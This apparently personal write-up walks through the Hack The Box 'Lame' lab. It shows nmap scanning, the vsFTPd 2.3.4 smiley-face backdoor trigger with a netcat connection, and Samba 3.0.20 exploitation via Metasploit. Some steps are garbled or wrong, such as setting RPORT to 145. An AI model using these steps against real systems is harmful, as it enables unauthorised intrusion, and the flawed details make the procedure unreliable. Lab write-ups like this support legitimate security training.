top of page

Linux Box Lame Walkthrough 

1.

The first step we must do is in Hack The Box look for our machine and in our VM make sure we sudo openvpn <.ovp> file and ping our target box. If the TTL is between 1-64, generally it is a Linux box. 64-128 is probably a Windows host. 128-255 is a network appliance. This isn't always the case, but generally, this can be true.

2.

MITRE ATTACK T1595 ACTIVE SCANNING. We will(SUDO nmap -VV -Pn -sCV -p0-65535 --reason -oN  lame.nmap 10.10.10.3 )this will asssume the host is active and run default scripts and do version enumeration and show the reason why certain things are block and export to a output file called lame.nmap.

3.

T1592.002 Gather Victim Host info we see that port 21 is avaible on the port while nmap is still going we gather info. (Ftp 10.10.10.3)

4.

We then get a banner that says that it is running vsFTPd 2.3.4

5.

We will then open searchsploit and and search vsFTPd

6.

Msfconsole

7.

Search vsftpd

8.

We can exploit this by using metasplot but if we look at the code then we can see that the code has a hard coded smile face to open in the id fiield :)

9.

We can go back to ftp and use :). To use this we will use our  USER username:) and Pass test

10.

We then nc 10.10.10.3 6200. when we enter id we see that nothing happens so we continue with our exploitation by looking at our scan we see that 22 is open but that isn't always the easiest to exploit so we see smb is open as well and decide to search for that

11.

Searchsploit smb 3.0.20 and searchsplot samba 3.0.20

12.
  1. In msf console search samba 3.0.20

  2. Use 0

  3. Options

13.

Set Rhost 10.10.10.3

14.

Set Rport 145

15.

Set LHOST

16. 

Set host our VPN from HTB

17.

Our payload set to automatic and run

18.

Sudo smbclient --no-pass //10.10.10.3/tmp

Lessons Learned

The Hack The Box Lame challenge provided valuable insights into ethical hacking and exploit discovery. By leveraging MITRE attack methods, I successfully navigated the challenge using steps that included active scanning and gathering victim host information. Through careful observation and analysis of the target machine, I was able to identify vulnerabilities and potential exploits. By examining the banner response of the FTP server, I discovered the version of vsFTPd running, which led me to search for specific exploits. Using the Metasploit Framework, I configured the necessary options and executed the chosen exploits. The challenge highlighted the importance of persistence and the understanding that not all vulnerabilities directly lead to access, but they can serve as crucial steps toward achieving the ultimate goal.

bottom of page